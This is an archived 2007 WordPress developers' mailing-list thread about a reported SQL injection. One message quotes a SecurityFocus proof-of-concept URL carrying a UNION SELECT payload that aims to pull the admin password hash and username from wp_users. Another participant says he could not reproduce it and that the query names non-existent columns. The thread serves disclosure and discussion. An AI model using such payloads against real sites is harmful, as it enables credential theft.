[wp-hackers] SQL injection

Andre SC andre at pixelplexus.co.za
Wed Dec 5 18:34:27 GMT 2007


http://www.securityfocus.com/archive/1/484608/30/0/threaded

(via 
http://www.google.co.za/search?q=security+focus+wordpress+SQL+injection :)

from the post:
~~~~~~~~~~~~~~~~~~SQL Injection ~~~~~~~~~~~~

Vulnerable URL : http://localhost/path_to_wordpress/?feed=rss2&p=

Parameter : P

POC = 
http://localhost/path_to_wordpress/?feed=rss2&p=11/**/union/**/select/**
/concat(user_password,char(100),username),2/**/from/**/wp_users/**/where
/**/user_id=1/*
  ---
Author : Beenu Arora

Mail : beenudel1986 (at) gmail (dot) com [email concealed]


    *
    * <http://www.securityfocus.com/archive/1/484608>


Computer Guru wrote:
> Back in the olden days before URIs were invented, people used to go on IRC
> and email and talk about something they'd seen in the massive, huge maze
> that was the world wide web. 
>
> Because many times people had no idea exactly what tiny bit of the huge www
> it was that someone was referring to, they invented something called a URI,
> and it looks something like this: http://cnn.com/
>
> With this URI, it became possible for people to add a _link_ to an email or
> IRC message so that people receiving the message would know WTF the OP was
> referring to, and see it for themselves.
>
> -CG
>
> -----Original Message-----
> From: wp-hackers-bounces at lists.automattic.com
> [mailto:wp-hackers-bounces at lists.automattic.com] On Behalf Of Stefano
> Aglietti
> Sent: Wednesday, December 05, 2007 8:02 PM
> To: wp-hackers at lists.automattic.com
> Subject: [wp-hackers] SQL injection
>
> on security focus today there is a security problme about WP, I looked
> at it and I was unable to reproduce it, and the sql query sound
> strange cause it refer to non existent colum ind user database...
>
> I suppose that even if it's a true problem it won't work for feeds
> redirected to feedburner, right?
>
> Thanks for any info.
>
>   




More information about the wp-hackers mailing list